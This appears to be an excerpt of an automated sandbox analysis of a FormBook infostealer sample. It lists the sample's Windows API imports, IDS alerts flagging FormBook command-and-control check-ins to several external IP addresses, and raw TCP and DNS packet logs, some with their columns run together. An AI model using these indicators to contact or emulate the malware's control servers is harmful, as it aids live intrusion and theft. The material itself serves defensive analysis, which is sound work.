WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T13:45:03.450115+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49827 | 154.216.76.80 | 80 | TCP
2024-11-25T13:45:03.450115+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49827 | 154.216.76.80 | 80 | TCP
2024-11-25T13:45:20.641849+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49866 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:23.406485+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49874 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:26.016198+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49883 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:28.719654+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49890 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:28.719654+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49890 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:35.709825+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49906 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:38.417505+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49913 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:41.101249+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49919 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:43.659303+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49928 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:43.659303+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49928 | 203.161.49.193 | 80 | TCP
2024-11-25T13:45:50.648849+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49945 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:53.210916+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49952 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:55.867569+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49958 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:58.579118+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49964 | 3.33.130.190 | 80 | TCP
2024-11-25T13:45:58.579118+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49964 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:05.569306+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49980 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:08.305397+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:11.040675+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:13.971819+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:13.971819+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50004 | 3.33.130.190 | 80 | TCP
2024-11-25T13:46:22.569295+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50022 | 198.252.98.54 | 80 | TCP
2024-11-25T13:46:25.223693+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50028 | 198.252.98.54 | 80 | TCP
2024-11-25T13:46:27.927685+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50029 | 198.252.98.54 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 13:45:01.761380911 CET | 49827 | 80 | 192.168.2.6 | 154.216.76.80
Nov 25, 2024 13:45:01.881459951 CET | 80 | 49827 | 154.216.76.80 | 192.168.2.6
Nov 25, 2024 13:45:01.881556034 CET | 49827 | 80 | 192.168.2.6 | 154.216.76.80
Nov 25, 2024 13:45:01.890682936 CET | 49827 | 80 | 192.168.2.6 | 154.216.76.80
Nov 25, 2024 13:45:02.010791063 CET | 80 | 49827 | 154.216.76.80 | 192.168.2.6
Nov 25, 2024 13:45:03.449635983 CET | 80 | 49827 | 154.216.76.80 | 192.168.2.6
Nov 25, 2024 13:45:03.449657917 CET | 80 | 49827 | 154.216.76.80 | 192.168.2.6
Nov 25, 2024 13:45:03.450114965 CET | 49827 | 80 | 192.168.2.6 | 154.216.76.80
Nov 25, 2024 13:45:03.558433056 CET | 49827 | 80 | 192.168.2.6 | 154.216.76.80
Nov 25, 2024 13:45:03.679193020 CET | 80 | 49827 | 154.216.76.80 | 192.168.2.6
Nov 25, 2024 13:45:19.360208988 CET | 49866 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:19.487195015 CET | 80 | 49866 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:19.487473965 CET | 49866 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:19.611828089 CET | 49866 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:19.731841087 CET | 80 | 49866 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:20.641779900 CET | 80 | 49866 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:20.641849041 CET | 49866 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:21.113703012 CET | 49866 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:21.234733105 CET | 80 | 49866 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:22.132657051 CET | 49874 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:22.252656937 CET | 80 | 49874 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:22.252769947 CET | 49874 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:22.263685942 CET | 49874 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:22.385926008 CET | 80 | 49874 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:23.406364918 CET | 80 | 49874 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:23.406485081 CET | 49874 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:23.770234108 CET | 49874 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:23.890677929 CET | 80 | 49874 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:24.790901899 CET | 49883 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:24.911628962 CET | 80 | 49883 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:24.911747932 CET | 49883 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:24.923760891 CET | 49883 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:25.043852091 CET | 80 | 49883 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:25.043885946 CET | 80 | 49883 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:26.015866041 CET | 80 | 49883 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:26.016197920 CET | 49883 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:26.426163912 CET | 49883 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:26.546211958 CET | 80 | 49883 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:27.454406977 CET | 49890 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:27.574403048 CET | 80 | 49890 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:27.574532986 CET | 49890 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:27.582034111 CET | 49890 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:27.702187061 CET | 80 | 49890 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:28.719489098 CET | 80 | 49890 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:28.719515085 CET | 80 | 49890 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:28.719654083 CET | 49890 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:28.722680092 CET | 49890 | 80 | 192.168.2.6 | 3.33.130.190
Nov 25, 2024 13:45:28.842654943 CET | 80 | 49890 | 3.33.130.190 | 192.168.2.6
Nov 25, 2024 13:45:34.317651033 CET | 49906 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:34.438114882 CET | 80 | 49906 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:34.438390970 CET | 49906 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:34.450251102 CET | 49906 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:34.570185900 CET | 80 | 49906 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:35.709458113 CET | 80 | 49906 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:35.709780931 CET | 80 | 49906 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:35.709825039 CET | 49906 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:35.957592010 CET | 49906 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:36.976888895 CET | 49913 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:37.097455978 CET | 80 | 49913 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:37.097542048 CET | 49913 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:37.109692097 CET | 49913 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:37.229650021 CET | 80 | 49913 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:38.417433977 CET | 80 | 49913 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:38.417452097 CET | 80 | 49913 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:38.417505026 CET | 49913 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:38.613883018 CET | 49913 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:39.632834911 CET | 49919 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:39.753650904 CET | 80 | 49919 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:39.753772020 CET | 49919 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:39.778448105 CET | 49919 | 80 | 192.168.2.6 | 203.161.49.193
Nov 25, 2024 13:45:39.898418903 CET | 80 | 49919 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:39.898538113 CET | 80 | 49919 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:41.100908995 CET | 80 | 49919 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:41.101022959 CET | 80 | 49919 | 203.161.49.193 | 192.168.2.6
Nov 25, 2024 13:45:41.101248980 CET | 49919 | 80 | 192.168.2.6 | 203.161.49.193
                                                            Nov 25, 2024 13:45:41.285659075 CET4991980192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.305468082 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.425537109 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:42.425652981 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.436083078 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.556210041 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:43.659126043 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:43.659209967 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:43.659302950 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:43.662508011 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:43.782736063 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:49.334851027 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:49.455251932 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:49.455399990 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:49.467888117 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:49.588433981 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:50.648751974 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:50.648849010 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:50.973134041 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:51.093125105 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:51.992275953 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:52.112586975 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:52.112668991 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:52.125418901 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:52.245496988 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:53.210702896 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:53.210916042 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:53.629611015 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:53.749561071 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:54.649065018 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:54.769190073 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:54.769310951 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:54.780652046 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:54.901223898 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:54.901269913 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:55.867486000 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:55.867568970 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:56.286015987 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:56.407413006 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:57.304990053 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:57.425326109 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:57.427727938 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:57.439598083 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:57.559770107 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:58.578916073 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:58.579065084 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:58.579118013 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:58.582123995 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:58.702269077 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:04.250128031 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:04.370202065 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:04.370294094 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:04.384766102 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:04.505171061 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:05.569098949 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:05.569305897 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:05.895015001 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:06.015448093 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:07.038922071 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:07.158957958 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:07.159049988 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:07.180429935 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:07.300741911 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:08.302901030 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:08.305397034 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:08.693152905 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:08.813090086 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:09.775477886 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:09.895524025 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:09.895598888 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:10.116610050 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:10.236610889 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:10.236655951 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:11.040512085 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:11.040674925 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:11.631644011 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:11.902959108 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:12.696012974 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:12.868207932 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:12.868366957 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:12.879642010 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:12.999666929 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:13.971539974 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:13.971771002 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:13.971818924 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:13.974847078 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:14.094827890 CET80500043.33.130.190192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 13:45:00.939471006 CET | 54841 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 13:45:01.754430056 CET | 53 | 54841 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 13:45:18.602067947 CET | 58425 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 13:45:19.310136080 CET | 53 | 58425 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 13:45:33.728423119 CET | 51834 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 13:45:34.315078974 CET | 53 | 51834 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 13:45:48.688644886 CET | 54354 | 53 | 192.168.2.6 | 1.1.1.1
Nov 25, 2024 13:45:49.331501961 CET | 53 | 54354 | 1.1.1.1 | 192.168.2.6
Nov 25, 2024 13:46:03.635704994 CET | 64989 | 53 | 192.168.2.6 | 1.1.1.1
